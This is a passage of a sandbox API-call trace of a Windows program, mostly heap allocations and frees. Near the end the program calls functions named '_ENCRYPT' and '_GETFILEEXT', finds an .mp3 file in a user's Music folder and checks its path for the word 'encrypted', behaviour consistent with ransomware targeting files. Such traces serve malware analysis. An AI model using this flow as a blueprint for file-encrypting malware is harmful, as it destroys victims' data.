dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0037.722] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0037.722] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0037.722] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0037.722] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0037.722] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0037.722] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0037.722] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0037.722] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0037.722] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0037.722] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0037.722] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0037.722] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0037.722] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0037.722] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0037.722] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0037.722] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0037.722] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0037.722] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0037.722] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0037.722] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0037.722] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0037.722] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0037.722] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0037.722] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0037.722] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0037.722] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0037.722] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0037.723] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0037.723] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0037.723] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0037.723] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0037.723] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0037.723] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0037.723] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5b30 | out: hHeap=0x770000) returned 1 [0037.723] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0037.723] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13f0 [0037.723] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0037.723] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0037.723] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0037.723] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0037.723] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0037.723] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0037.723] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0037.723] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0037.723] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0037.723] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0037.723] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0037.723] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0037.723] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0037.723] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0037.723] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0037.723] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0037.723] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2080 [0037.723] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0037.723] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0037.723] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0037.723] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0037.723] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0037.724] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0037.724] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0037.724] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0037.724] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0037.724] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0037.724] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0037.724] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0037.724] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0037.724] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0037.724] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0037.724] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0037.724] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0037.724] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0037.724] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0037.724] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0037.724] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0037.724] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0037.724] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0037.724] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0037.724] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0037.724] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0037.724] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0037.724] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0037.724] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0037.724] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0037.724] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0037.724] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0037.724] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0037.724] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0037.724] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0037.724] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0037.725] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0037.725] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0037.725] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0037.725] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0037.725] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0037.725] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0037.725] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0037.725] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0037.725] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0037.725] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0037.725] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0037.725] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0037.725] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c808 [0037.725] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x88c808, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0037.725] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0037.725] GetProcAddress (hModule=0x76e10000, lpProcName="CloseHandle") returned 0x76e21410 [0037.725] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0037.725] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0037.725] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0037.725] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0037.725] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0037.725] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0037.725] CloseHandle (hObject=0x128) returned 1 [0037.725] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0037.725] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b87d0 [0037.725] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0037.726] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0037.726] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0037.726] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0037.726] FreeLibrary (hLibModule=0x76e10000) returned 1 [0037.726] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0037.726] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0037.726] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0037.726] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0037.726] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0037.726] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0037.726] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0037.726] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0037.726] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0037.726] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0037.726] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0037.726] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0037.726] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0037.726] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0037.726] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0037.726] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0037.726] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0037.726] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0037.726] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0037.726] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0037.726] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0037.726] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0037.726] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0037.726] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0037.727] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0037.727] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0037.727] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.727] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0037.727] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0037.727] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.727] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.727] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.727] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mp3", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0037.727] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.727] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 1 [0037.727] TranslateMessage (lpMsg=0x6aefc4) returned 0 [0037.727] DispatchMessageW (lpMsg=0x6aefc4) returned 0x0 [0037.727] Shell_NotifyIconW (dwMessage=0x1, lpData=0x6ae660) returned 1 [0037.728] KillTimer (hWnd=0x50134, uIDEvent=0x1) returned 1 [0037.728] SetTimer (hWnd=0x50134, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0037.728] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.728] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.728] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\7d68KILlni\\SHI6u88nCZyGa2ZYK.mp3", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdbb7a8e0, ftCreationTime.dwHighDateTime=0x1d5b970, ftLastAccessTime.dwLowDateTime=0x3da53760, ftLastAccessTime.dwHighDateTime=0x1d5b9b3, ftLastWriteTime.dwLowDateTime=0x3da53760, ftLastWriteTime.dwHighDateTime=0x1d5b9b3, nFileSizeHigh=0x0, nFileSizeLow=0x152c0, dwReserved0=0x0, dwReserved1=0x777648, cFileName="SHI6u88nCZyGa2ZYK.mp3", cAlternateFileName="SHI6U8~1.MP3")) returned 0x7c20c0 [0037.729] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0037.729] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.729] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\7d68KILlni\\SHI6u88nCZyGa2ZYK.mp3", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdbb7a8e0, ftCreationTime.dwHighDateTime=0x1d5b970, ftLastAccessTime.dwLowDateTime=0x3da53760, ftLastAccessTime.dwHighDateTime=0x1d5b9b3, ftLastWriteTime.dwLowDateTime=0x3da53760, ftLastWriteTime.dwHighDateTime=0x1d5b9b3, nFileSizeHigh=0x0, nFileSizeLow=0x152c0, dwReserved0=0x0, dwReserved1=0x777648, cFileName="SHI6u88nCZyGa2ZYK.mp3", cAlternateFileName="SHI6U8~1.MP3")) returned 0x7c20c0 [0037.729] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0037.729] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.729] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\7d68KILlni\\SHI6u88nCZyGa2ZYK.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.729] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\7d68KILlni\\SHI6u88nCZyGa2ZYK.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.729] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\7d68KILlni\\SHI6u88nCZyGa2ZYK.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.729] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\7d68KILlni\\SHI6u88nCZyGa2ZYK.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.729] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Music\\7d68KILlni\\SHI6u88nCZyGa2ZYK.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.729] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Music\\7d68KILlni\\SHI6u88nCZyGa2ZYK.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.729] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Music\\7d68KILlni\\SHI6u88nCZyGa2ZYK.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.729] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Music\\7d68KILlni\\SHI6u88nCZyGa2ZYK.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.729] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Music\\7d68KILlni\\SHI6u88nCZyGa2ZYK.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.729] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Music\\7d68KILlni\\SHI6u88nCZyGa2ZYK.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.729] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Music\\7d68KILlni\\SHI6u88nCZyGa2ZYK.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.729] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Music\\7d68KILlni\\SHI6u88nCZyGa2ZYK.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.729] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Music\\7d68KILlni\\SHI6u88nCZyGa2ZYK.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.729] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Music\\7d68KILlni\\SHI6u88nCZyGa2ZYK.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.729] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Music\\7d68KILlni\\SHI6u88nCZyGa2ZYK.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.729] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Music\\7d68KILlni\\SHI6u88nCZyGa2ZYK.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.729] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Music\\7d68KILlni\\SHI6u88nCZyGa2ZYK.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.729] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Music\\7d68KILlni\\SHI6u88nCZyGa2ZYK.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.729] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Music\\7d68KILlni\\SHI6u88nCZyGa2ZYK.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.730] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Music\\7d68KILlni\\SHI6u88nCZyGa2ZYK.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.730] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Music\\7d68KILlni\\SHI6u88nCZyGa2ZYK.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.730] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Music\\7d68KILlni\\SHI6u88nCZyGa2ZYK.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.730] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Music\\7d68KILlni\\SHI6u88nCZyGa2ZYK.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.730] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Music\\7d68KILlni\\SHI6u88nCZyGa2ZYK.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.730] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Music\\7d68KILlni\\SHI6u88nCZyGa2ZYK.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.730] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Music\\7d68KILlni\\SHI6u88nCZyGa2ZYK.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.730] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Music\\7d68KILlni\\SHI6u88nCZyGa2ZYK.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.730] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Music\\7d68KILlni\\SHI6u88nCZyGa2ZYK.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.730] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Music\\7d68KILlni\\SHI6u88nCZyGa2ZYK.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.730] CompareStringW (Locale=0x400, dwCmpFlags=0x1, 